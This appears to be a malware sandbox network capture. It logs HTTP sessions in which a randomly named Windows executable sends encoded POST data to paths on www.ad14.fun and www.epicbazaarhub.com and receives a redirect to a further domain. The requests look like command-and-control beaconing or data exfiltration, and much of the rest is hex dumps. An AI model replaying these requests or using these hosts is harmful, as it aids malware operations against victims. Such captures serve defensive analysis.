                                                    Jul 3, 2024 17:51:27.311000109 CEST1236INData Raw: 70 2e 61 2e 70 75 73 68 28 5b 5d 2e 73 6c 69 63 65 2e 61 70 70 6c 79 28 61 29 29 7d 65 6c 73 65 7b 69 66 28 61 2e 6c 65 6e 67 74 68 3d 3d 34 26 26 61 5b 33 5d 3d 3d 3d 66 61 6c 73 65 29 7b 61 5b 32 5d 28 7b 7d 2c 66 61 6c 73 65 29 7d 65 6c 73 65
                                                    Data Ascii: p.a.push([].slice.apply(a))}else{if(a.length==4&&a[3]===false){a[2]({},false)}else{__cmp.a.push([].slice.apply(a))}}}}}}};window.cmp_gpp_ping=function(){return{gppVersion:"1.0",cmpStatus:"stub",cmpDisplayStatus:"hidden",supportedAPIs:["tcfca",
                                                    Jul 3, 2024 17:51:27.311012030 CEST1236INData Raw: 63 65 2e 61 70 70 6c 79 28 61 29 29 7d 7d 7d 7d 7d 7d 3b 77 69 6e 64 6f 77 2e 63 6d 70 5f 6d 73 67 68 61 6e 64 6c 65 72 3d 66 75 6e 63 74 69 6f 6e 28 64 29 7b 76 61 72 20 61 3d 74 79 70 65 6f 66 20 64 2e 64 61 74 61 3d 3d 3d 22 73 74 72 69 6e 67
                                                    Data Ascii: ce.apply(a))}}}}}};window.cmp_msghandler=function(d){var a=typeof d.data==="string";try{var c=a?JSON.parse(d.data):d.data}catch(f){var c=null}if(typeof(c)==="object"&&c!==null&&"__cmpCall" in c){var b=c.__cmpCall;window.__cmp(b.command,b.param
                                                    Jul 3, 2024 17:51:27.311520100 CEST1236INData Raw: 74 79 70 65 6f 66 28 77 69 6e 64 6f 77 5b 61 5d 29 21 3d 3d 22 6f 62 6a 65 63 74 22 26 26 28 74 79 70 65 6f 66 28 77 69 6e 64 6f 77 5b 61 5d 29 3d 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 7c 7c 77 69 6e 64 6f 77 5b 61 5d 21 3d 3d 6e 75 6c 6c 29 29
                                                    Data Ascii: typeof(window[a])!=="object"&&(typeof(window[a])==="undefined"||window[a]!==null))){window[a]=window.cmp_stub;window[a].msgHandler=window.cmp_msghandler;window.addEventListener("message",window.cmp_msghandler,false)}};window.cmp_setGppStub=fun


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    5192.168.2.649732188.114.96.3805776C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 17:51:32.454891920 CEST589OUTPOST /oc7s/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Cache-Control: max-age=0
                                                    Content-Length: 212
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Host: www.ad14.fun
                                                    Origin: http://www.ad14.fun
                                                    Referer: http://www.ad14.fun/oc7s/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Data Raw: 37 44 69 68 73 38 70 3d 46 52 62 55 33 72 74 4e 33 6c 33 71 63 43 33 51 64 78 69 6e 41 49 6a 44 77 39 58 54 66 41 67 5a 6b 33 42 75 70 78 78 4a 4d 2f 69 50 65 41 4c 6b 65 44 62 4e 56 4e 37 56 67 54 57 4b 65 39 66 48 6e 51 5a 51 7a 46 30 65 4c 33 6f 55 46 68 63 79 76 55 57 61 41 4f 47 4a 32 67 48 7a 39 33 4d 55 51 4c 4e 70 6f 51 34 7a 75 42 59 59 76 66 4b 6c 62 61 48 64 55 4b 79 6c 6f 65 61 74 39 7a 75 6a 68 6f 4a 6f 75 4e 64 44 76 6d 32 61 62 53 4d 63 6d 56 42 65 73 76 52 66 78 33 63 58 76 6b 6c 32 39 6a 35 4a 5a 6b 78 71 6c 64 32 4a 49 75 56 54 38 44 38 43 78 72 67 71 46 46 57 37 46 44 35 57 6f 76 53 73 35 32 77 68 4b 63 57 6e
                                                    Data Ascii: 7Dihs8p=FRbU3rtN3l3qcC3QdxinAIjDw9XTfAgZk3BupxxJM/iPeALkeDbNVN7VgTWKe9fHnQZQzF0eL3oUFhcyvUWaAOGJ2gHz93MUQLNpoQ4zuBYYvfKlbaHdUKyloeat9zujhoJouNdDvm2abSMcmVBesvRfx3cXvkl29j5JZkxqld2JIuVT8D8CxrgqFFW7FD5WovSs52whKcWn
                                                    Jul 3, 2024 17:51:33.242646933 CEST1236INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 15:51:33 GMT
                                                    Content-Type: text/html;charset=utf-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Vary: Accept-Encoding
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vca%2FlMvIwrY5lzAcIcAz7kimKxZx8iNN5RZ34hjjDl7y2CoZTGsCkBkcGE5kE9KFg4oJk4lFgNlYzOHJ919CR4x55bfm0jYYDXcqY22N0XZkdjFMvAI%2BmKimsZPHXKg%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d8099e69608c8d-EWR
                                                    Content-Encoding: gzip
                                                    alt-svc: h3=":443"; ma=86400
                                                    Data Raw: 33 30 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 c4 56 5d 6f 12 41 14 fd 2b eb 24 a6 6d a8 5d 6c a2 35 76 59 1f d4 18 5f d4 44 5f 7c 22 db 65 0a 6b 81 6d 76 a7 6d fa 06 b6 52 68 f9 68 13 48 a9 a5 11 b1 25 a4 4d d9 7e 90 c2 82 c0 9f d9 99 5d 9e fc 0b 66 3b 1b b3 88 fa 46 7c d9 49 e6 de 39 f7 cc 99 33 77 96 bb f3 ec f5 d3 77 ef df 3c 67 42 28 12 e6 39 fb cb 84 85 68 d0 07 60 14 f0 5c 08 0a 01 9e 8b 40 24 30 62 48 50 54 88 7c 00 ad 2c de 7b 04 58 9e 43 12 0a 43 7e 32 24 c8 0f 67 56 a5 e5 29 eb a2 49 ce d3 41 59 0e 86 a1 d5 a8 e2 5c d3 6a 9c 1b fa c5 8f ef 69 92 ad 99 29 1d ad 49 08 2a bf 85 02 92 2a ca 4a c0 3d eb 27 d7 35 9c 18 8e 98 f9 da e0 63 dd ac 5f 5a fd 22 29 6a 24 b5 43 4a 6d bf bb 18 9d c2 b9 22 39 6c 0c 4e d3 96 16 b7 da 67 46 a7 eb 24 e1 42 02 b7 f7 ad dc 15 ee ed e0 7a cf 59 73 5b c8 3f 86 3d 70 2c 95 87 8a 17 15 22 d0 07 96 e0 fa 9a ac 04 54 c0 88 72 14 c1 28 f2 81 31 54 a6 40 58 ef e3 bd 6d 2b 9e 37 0f bf b8 a3 d3 b4 02 43 b4 9c d1 3a 25 a5 e4 03 a3 75 4a 13 a6 47 29 50 7d 8c 56 c6 68 27 a6 [TRUNCATED]
                                                    Data Ascii: 30eV]oA+$m]l5vY_D_|"ekmvmRhhH%M~]f;F|I93ww<gB(9h`\@$0bHPT|,{XCC~2$gV)IAY\ji)I**J='5c_Z")j$CJm"9lNgF$BzYs[?=p,"Tr(1T@Xm+7C:%uJG)P}Vh'qbV5n;r0T .pmL:}Y]AwNm,R)3f|"-#IW|A)L0qY8,G[pR/_6[^U\+4JJ);nvpT1?o}eA%"H$5 s$5..]qtzom3!mnHzC/mM,FI9ln
                                                    Jul 3, 2024 17:51:33.242700100 CEST187INData Raw: 9c e1 64 79 70 70 3c 16 17 c4 4e 06 a5 61 cd 17 05 11 2e c8 f2 d2 50 5a 4a c7 b9 bd 71 10 b0 db 0b ed 28 fc aa a0 30 aa ca f8 00 b7 a8 08 11 e0 01 50 85 88 11 e5 b0 ea 9b b8 0f 3c c0 eb bd 3b c1 ff 8a 31 aa 02 3c 40 f4 4d 84 10 5a 56 1f b3 6c 48
                                                    Data Ascii: dypp<Na.PZJq(0P<;1<@MZVlHlnX$GY~yYQhfTS`jcK9s3aN0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    6192.168.2.649733188.114.96.3805776C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 17:51:34.995667934 CEST613OUTPOST /oc7s/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Cache-Control: max-age=0
                                                    Content-Length: 236
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Host: www.ad14.fun
                                                    Origin: http://www.ad14.fun
                                                    Referer: http://www.ad14.fun/oc7s/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Data Raw: 37 44 69 68 73 38 70 3d 46 52 62 55 33 72 74 4e 33 6c 33 71 47 69 6e 51 4f 53 4b 6e 51 59 6a 4d 31 39 58 54 56 67 68 51 6b 33 46 75 70 77 45 53 4e 4a 61 50 66 6c 33 6b 66 43 62 4e 63 64 37 56 72 7a 57 4c 61 39 66 63 6e 51 45 6c 7a 48 67 65 4c 33 38 55 46 68 73 79 76 48 4f 5a 41 65 47 4c 6a 51 48 78 7a 58 4d 55 51 4c 4e 70 6f 51 38 5a 75 46 30 59 73 75 36 6c 63 4c 48 61 4b 61 79 6d 67 2b 61 74 35 7a 75 6e 68 6f 49 39 75 4d 51 65 76 6c 4f 61 62 58 49 63 6e 41 39 66 6c 76 52 6a 2f 58 64 38 72 6d 4d 6e 34 54 45 77 61 69 6c 30 36 4e 57 70 41 34 55 4a 67 77 38 68 6a 37 41 6f 46 48 4f 4a 46 6a 35 38 71 76 71 73 72 68 38 47 46 6f 7a 45 42 32 74 65 32 61 31 64 4a 45 6e 67 34 6d 75 36 37 56 54 67 39 51 3d 3d
                                                    Data Ascii: 7Dihs8p=FRbU3rtN3l3qGinQOSKnQYjM19XTVghQk3FupwESNJaPfl3kfCbNcd7VrzWLa9fcnQElzHgeL38UFhsyvHOZAeGLjQHxzXMUQLNpoQ8ZuF0Ysu6lcLHaKaymg+at5zunhoI9uMQevlOabXIcnA9flvRj/Xd8rmMn4TEwail06NWpA4UJgw8hj7AoFHOJFj58qvqsrh8GFozEB2te2a1dJEng4mu67VTg9Q==
                                                    Jul 3, 2024 17:51:35.760761976 CEST1236INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 15:51:35 GMT
                                                    Content-Type: text/html;charset=utf-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Vary: Accept-Encoding
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wMYvKF18P9QL1yUsMPyuhCbLPkUshg1rZaBX6Ilnw%2Bo7bIAVtQYGxV8tEOi%2BBY%2FaIoAHhYBsn6nMpSBHwMBm7cf4ayFGpSuR7Mc51KfQEjWaXN0erDTMcdgawdOlfLU%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d809ae9af96a5e-EWR
                                                    Content-Encoding: gzip
                                                    alt-svc: h3=":443"; ma=86400
                                                    Data Raw: 33 32 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b4 56 cf 53 d3 40 14 fe 57 e2 ce 38 c0 b4 92 82 33 a2 92 c6 83 7a d6 83 17 4f 99 90 2e 6d a4 ed 32 c9 02 c3 8d 1f 0a a5 94 b6 6a 2b 54 c0 01 06 98 ca 0c 2d 50 b0 bf 2c fc 33 d9 dd f4 e4 bf e0 84 0d 18 14 c6 53 2e 9b d9 7d 6f df f7 ed b7 ef bd 8d 74 ef c5 ab e7 6f de be 7e 29 c4 70 22 2e 4b ce 28 c4 d5 64 34 0c 60 12 c8 52 0c aa 11 59 4a 40 ac 0a 5a 4c 35 4c 88 c3 00 4f 8c 3e 78 0c 44 59 c2 3a 8e 43 b9 37 a6 a2 47 fd 93 fa 78 9f 7d 54 a7 87 99 28 42 d1 38 b4 4f f7 49 ae 6e 9f 1e 5a cd a3 5f 3f 33 34 5b 66 4b 4d 3c a5 63 68 fc 65 8a e8 a6 86 8c 88 77 55 a1 f5 35 52 d9 e4 13 72 3c d3 2d 5e d0 6c d9 5e c9 73 84 ee 5c 85 55 8e f9 06 85 c3 91 d4 3a 69 b7 f8 12 2b d4 ec 6a 5d e9 36 2e ec 4f a5 87 02 6b ed 58 ad 05 2f 2b c5 07 ca 92 c8 d5 e0 5a 25 d5 04 0c 83 31 38 3d 85 8c 88 09 04 0d 25 31 4c e2 30 f0 01 d9 1d 2f c3 d1 46 83 a6 72 ae b5 53 b5 da 3f 82 5c 0d 2f 0e ad 95 c9 42 66 30 34 18 0a 92 f5 0e d9 fd c2 f7 ea 37 a2 06 bd 61 b9 81 e4 b3 a4 ba c0 b6 66 bb 85 [TRUNCATED]
                                                    Data Ascii: 323VS@W83zO.m2j+T-P,3S.}oto~)p".K(d4`RYJ@ZL5LO>xDY:C7Gx}T(B8OInZ_?34[fKM<chewU5Rr<-^l^s\U:i+j]6.OkX/+Z%18=%1L0/FrS?\/Bf047af]yLN^+WvqFdAw1Jm)= P96Mj4ffXGIw)su=c5S}l*d+|o9GpC2WPAx\])Z+*l'$BZWgvunZV+=Y5^O=zM7>?"(ZUSZhr8u>ZAy%)^.-u/`YQ<0-Xyj,2jp
                                                    Jul 3, 2024 17:51:35.760785103 CEST195INData Raw: 31 d7 61 f1 80 a4 bf 73 b7 81 10 f9 30 ef c7 21 13 fa 84 fe 44 a0 f5 36 49 6f dd 68 e6 fc 2c de 25 b2 7b 4a e6 73 ee 6d ac ec f8 c1 c6 e9 3d bc dd c8 93 aa 21 98 a6 10 06 d2 a8 a1 26 40 00 40 13 62 41 43 71 33 dc 33 00 02 20 14 ba df 23 5f db 04
                                                    Data Ascii: 1as0!D6Ioh,%{Jsm=!&@@bACq33 #_{bOE1![xQ2Nwg"L=H2jD`" pB`aItK"GPdZDss00


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    7192.168.2.649734188.114.96.3805776C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 17:51:37.834734917 CEST1626OUTPOST /oc7s/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Cache-Control: max-age=0
                                                    Content-Length: 1248
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Host: www.ad14.fun
                                                    Origin: http://www.ad14.fun
                                                    Referer: http://www.ad14.fun/oc7s/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Data Raw: 37 44 69 68 73 38 70 3d 46 52 62 55 33 72 74 4e 33 6c 33 71 47 69 6e 51 4f 53 4b 6e 51 59 6a 4d 31 39 58 54 56 67 68 51 6b 33 46 75 70 77 45 53 4e 4b 36 50 65 58 50 6b 65 6c 50 4e 47 64 37 56 31 44 57 47 61 39 65 45 6e 51 64 74 7a 48 63 6b 4c 79 34 55 46 43 6b 79 37 6d 4f 5a 4c 65 47 4c 68 51 48 77 39 33 4e 4f 51 4c 64 74 6f 51 73 5a 75 46 30 59 73 73 69 6c 50 36 48 61 49 61 79 6c 6f 65 61 78 39 7a 75 50 68 6f 41 74 75 4d 45 4f 76 30 75 61 62 33 34 63 68 32 70 66 75 76 52 6c 38 58 64 6b 72 6d 52 2f 34 51 68 50 61 69 35 4f 36 4f 4b 70 52 76 78 6f 6c 6a 55 37 78 34 55 78 5a 77 32 70 45 45 42 5a 76 70 2b 4a 36 6e 67 58 61 71 75 71 49 6d 70 33 30 62 6b 70 44 6d 72 41 6b 68 72 75 32 46 57 6b 67 42 68 73 46 59 38 76 58 70 58 4f 68 45 37 4c 6c 66 2b 58 4e 6a 70 44 48 72 72 36 42 31 68 46 72 32 33 58 64 4d 57 31 66 63 34 49 52 52 66 74 71 39 76 31 30 6a 65 34 30 33 78 76 4f 72 58 47 64 35 61 57 53 4c 6d 46 66 65 72 75 4f 72 79 46 6c 6a 42 4e 44 55 4c 4c 64 50 70 41 6a 42 37 53 62 46 4e 6c 38 4e 61 4d 4a 4b [TRUNCATED]
                                                    Data Ascii: 7Dihs8p=FRbU3rtN3l3qGinQOSKnQYjM19XTVghQk3FupwESNK6PeXPkelPNGd7V1DWGa9eEnQdtzHckLy4UFCky7mOZLeGLhQHw93NOQLdtoQsZuF0YssilP6HaIayloeax9zuPhoAtuMEOv0uab34ch2pfuvRl8XdkrmR/4QhPai5O6OKpRvxoljU7x4UxZw2pEEBZvp+J6ngXaquqImp30bkpDmrAkhru2FWkgBhsFY8vXpXOhE7Llf+XNjpDHrr6B1hFr23XdMW1fc4IRRftq9v10je403xvOrXGd5aWSLmFferuOryFljBNDULLdPpAjB7SbFNl8NaMJKKwZQxYSYeBpOjST2aMw5tyxuGfA6mEyCk85kdSTexcPDhsQg6fU0KKPnbTZeNWwu3WR2A9sEsbRwbiuJqYu7iiO8wG/pTDNCkG69x+1cQfxAQCQlYLseAXs8P8HSezsk/KXNj6z0V6N7/kcQ5xZOIg7VClOIt4CNL26ggKggJLsmF8+zCWxcJN3evzRrTF1TqXsstq0gVZFZsEfejiUGZmUSGqyftJxnB61Qd0twcXfkoYaIU4gUYFkATF1bTwoIg+QYeuPb2U+pEvUYRDS+f4ME4vEd37h2r64K4J6FciXXKNSXhgyNA2m6yY/4kC/DiHvPHREdkWoqkalvpx8sxy8hkgrZNxi8gyq4z8BIpeaFSsGNgcMLYCkneZ3HxEjodsgig8yEbs/UI9b398Bz8oSjccmnOr7QuHLxidef6haYqTe6hi9ccCCYSO3x0FZBrZbSOb66udz7C0LRtTYuyXI7vE0WK+x9P6WFmo9DiyctDTZLdhaI3kIvGAbqTLfuafCfktH/nvqP0LHBQSMK+ZTmLbK0PMgB2kBAyEJXw550tnlYAkJZ//qTHM8el+tHlhbAsd8MnzYZiewd2SJevACANCi87lKgay6cxLp8iwdgBXJqBz7ZyCaBflQyKpNBaLWQM7AWcPfBUwvYxoGRD1iMNfWm9cHsXO [TRUNCATED]
                                                    Jul 3, 2024 17:51:38.469121933 CEST1236INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 15:51:38 GMT
                                                    Content-Type: text/html;charset=utf-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Vary: Accept-Encoding
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7RY00rPIFTNQQ79gcyCPtGBp%2FbsiMI2M8VSMwZGd%2FqUL7ztayMmjhfEThWjr38FmnY4%2BEd0TAP4V9hPWQJOGjx6k0iTQTJrVWojy%2Fs3W6lVBuR7VEAzPVXnjLv7iXyY%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d809bffc810f53-EWR
                                                    Content-Encoding: gzip
                                                    alt-svc: h3=":443"; ma=86400
                                                    Data Raw: 33 30 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b4 55 df 4f da 50 14 fe 57 ba 9b 2c 68 60 56 b3 64 2e b3 74 0f db b2 c7 ed 61 2f 7b 22 1d 54 e8 06 ad 69 af 1a df 74 2a 3f 06 14 8c a2 88 2c a8 d9 0c 31 02 6e 23 22 28 f2 cf f4 f4 96 a7 fd 0b 4b b9 8d 29 93 d7 be b4 bd bd e7 9e f3 9d ef 7c e7 5c ee d1 eb 77 af 3e 7c 7c ff 86 89 e1 44 9c e7 ec 27 13 17 e4 68 10 89 32 e2 b9 98 28 44 78 2e 21 62 81 09 c7 04 55 13 71 10 e1 e5 c5 27 cf 11 cb 73 58 c2 71 91 9f 8a 09 ca b3 99 15 69 69 da ba ec 98 8d 5c 54 51 a2 71 d1 6a 9f 41 a1 63 b5 1b 46 f7 f2 ef 6d ce d4 eb 24 d3 c5 ab 12 16 d5 ff b6 22 92 16 56 d4 88 fb 6f 08 f2 3a 39 29 b9 3d 85 e8 82 a1 2b 73 5d 37 ba 69 f3 4f 1d 92 b9 10 a4 3b 66 b5 07 45 1d 06 65 a3 97 74 9f 82 56 92 1c 6f 84 3c 80 c8 b1 34 7b ca 8d 2c 24 c4 20 fa 22 ae ad 2a 6a 44 43 4c 58 91 b1 28 e3 20 f2 20 b2 db 85 9b 07 68 66 20 bf 1b 30 ae 33 66 b9 06 e9 23 b8 e9 3d a4 22 20 c9 1a 16 a2 aa 90 70 1c 64 ba c3 54 81 3a 0e 40 f5 92 64 4e 49 4e 37 33 d9 a7 8c fb 70 80 a2 77 c3 98 83 ed 4d 1a 9e ec d5 [TRUNCATED]
                                                    Data Ascii: 305UOPW,h`Vd.ta/{"Tit*?,1n#"(K)|\w>||D'h2(Dx.!bUq'sXqii\TQqjAcFm$"Vo:9)=+s]7iO;fEetVo<4{,$ "*jDCLX( hf 03f#=" pdT:@dNIN73pwM-@t8W_<R2Iil40/NfV`lEyD%Eu*9&CcLW{>Lhj!`W|j`5H #12l9/.M(ZQ{Be ]r~Tr$FnA@^=4I2#k18w>K!)zPyvjwd2n''UlT)l<!$gWpvL<g
                                                    Jul 3, 2024 17:51:38.469666958 CEST162INData Raw: b5 36 de ba 05 69 5c 37 ee 87 8c 3b 67 e8 ed 8d c6 50 12 7a 07 8e a9 07 c8 ec e1 43 e7 0d bf 22 a8 8c a6 31 41 c4 2d aa 42 02 f9 91 a8 89 98 09 2b 71 2d e8 9b 43 7e 34 3b fb d8 c7 df ef 31 9a 8a fc 28 1c f4 c5 30 5e d2 5e b0 6c 4c 50 e6 6d 6c 3e
                                                    Data Ascii: 6i\7;gPzC"1A-B+q-C~4;1(0^^lLPml>v9Y/XuE"PD#?ZN2#<j8!?:9^kt
                                                    Jul 3, 2024 17:51:38.469679117 CEST20INData Raw: 61 0d 0a 03 00 d4 98 d4 7a 06 08 00 00 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: az0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    8192.168.2.649735188.114.96.3805776C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 17:51:40.364011049 CEST340OUTGET /oc7s/?Bp=2LpD8tLh&7Dihs8p=ITz00edB1Uq7JDbRPTK5B57t89T2WQZ+hnFFsCQVLpiDf2LeJizgG+jH2jz5I+TBlRR/yAoHWWMQTB4d0WCMdZHpvgPMtRMFWqdBjyYGuisLgsnAd4XsPoSnl82L2CWvs48fsL0= HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US,en;q=0.9
                                                    Connection: close
                                                    Host: www.ad14.fun
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Jul 3, 2024 17:51:41.055814981 CEST753INHTTP/1.1 302 Moved Temporarily
                                                    Date: Wed, 03 Jul 2024 15:51:40 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Location: http://yg08.gowi0i.xyz
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dWnaLNhdp1cX2excPqk8GyFBHtl%2FCi4nRzu6xutVe4RaPnShOqOGWV4fhO87DwzFMQpTJXZ3Ay1CTTIARlwCwD2nzHnzX%2F1PAXVcVBc%2BLp1GfyP3B8u06Rm0iApbcws%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d809cfdfba178c-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    Data Raw: 38 61 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8a<html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    9192.168.2.649737192.185.208.8805776C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 17:51:46.558480024 CEST616OUTPOST /2769/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Cache-Control: max-age=0
                                                    Content-Length: 212
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Host: www.epicbazaarhub.com
                                                    Origin: http://www.epicbazaarhub.com
                                                    Referer: http://www.epicbazaarhub.com/2769/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Data Raw: 37 44 69 68 73 38 70 3d 6d 53 56 73 53 66 61 67 71 57 51 75 72 65 46 57 4a 33 4d 43 66 6b 5a 37 48 35 77 57 74 45 33 38 32 33 51 7a 59 54 2f 32 42 71 77 4b 4f 48 43 62 6a 56 72 41 66 73 51 32 70 59 48 4f 47 57 49 2b 77 56 46 4f 6c 6a 46 50 71 46 79 59 4e 38 4e 62 56 33 61 35 51 52 7a 36 37 4d 68 39 4b 70 7a 6e 77 63 35 2b 4f 68 6f 45 57 7a 41 44 52 38 32 52 4b 33 6f 6f 53 43 4a 35 32 54 2b 79 6f 69 69 6f 4c 6d 50 2f 6b 41 57 34 47 38 4f 66 36 62 72 6a 6c 42 6f 5a 58 57 7a 67 63 37 35 31 4f 46 50 54 75 6f 68 31 6d 36 74 77 6e 65 79 34 55 76 4e 49 6e 55 63 5a 6c 71 7a 6d 6f 71 77 6e 78 6e 4b 64 41 73 7a 75 71 36 34 41 58 30 79 43
                                                    Data Ascii: 7Dihs8p=mSVsSfagqWQureFWJ3MCfkZ7H5wWtE3823QzYT/2BqwKOHCbjVrAfsQ2pYHOGWI+wVFOljFPqFyYN8NbV3a5QRz67Mh9Kpznwc5+OhoEWzADR82RK3ooSCJ52T+yoiioLmP/kAW4G8Of6brjlBoZXWzgc751OFPTuoh1m6twney4UvNInUcZlqzmoqwnxnKdAszuq64AX0yC
                                                    Jul 3, 2024 17:51:47.246383905 CEST1236INHTTP/1.1 404 Not Found
                                                    Date: Wed, 03 Jul 2024 15:51:46 GMT
                                                    Server: Apache
                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                    Link: <https://epicbazaarhub.com/wp-json/>; rel="https://api.w.org/"
                                                    Upgrade: h2,h2c
                                                    Connection: Upgrade, close
                                                    Vary: Accept-Encoding
                                                    Content-Encoding: gzip
                                                    Content-Length: 14879
                                                    Content-Type: text/html; charset=UTF-8
                                                    Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd b2 eb 96 eb 36 92 35 f8 fb e4 53 c0 f2 b2 53 b2 05 89 ba e5 85 4a 65 95 af 5d fe a6 dc f6 aa e3 ea 9a 6f 6c af 5c 20 19 22 71 12 04 58 00 28 a5 8e 2a 1f e6 5b f3 16 f3 b7 5f 6c 02 a4 ee a2 94 ca 4b 77 75 77 5e 48 22 10 b1 63 c7 8e 7d f3 c9 b7 3f 7d f3 cb ff fe f9 3b 92 d8 54 dc 9e dd b8 17 11 4c c6 a3 5a 66 e9 d7 7f a9 b9 18 b0 e8 f6 ec dd 4d 0a 96 91 30 61 da 80 1d d5 fe fa cb f7 f4 aa 46 da ab 1b c9 52 18 d5 26 1c a6 99 d2 b6 46 42 25 2d 48 cc 9c f2 c8 26 a3 08 26 3c 04 5a 1c 9a 84 4b 6e 39 13 d4 84 4c c0 a8 53 e0 6c c0 9c 6b 15 28 6b ce 57 20 e7 29 7b a0 3c 65 31 d0 4c 83 6b e2 0b a6 63 38 2f 0a 2d b7 02 6e 7f fe f7 ff 13 73 89 08 ff fe ff 2a 02 d2 95 6a 16 31 f2 f9 a7 57 dd 4e 67 48 20 e3 61 c0 3e 32 a6 93 3c 68 85 2a bd 69 97 85 67 37 82 cb 7b a2 41 8c ce 23 69 5c 87 31 d8 30 39 27 09 7e 8d ce db ed bd d2 b2 ef aa ac c6 84 05 2d 99 85 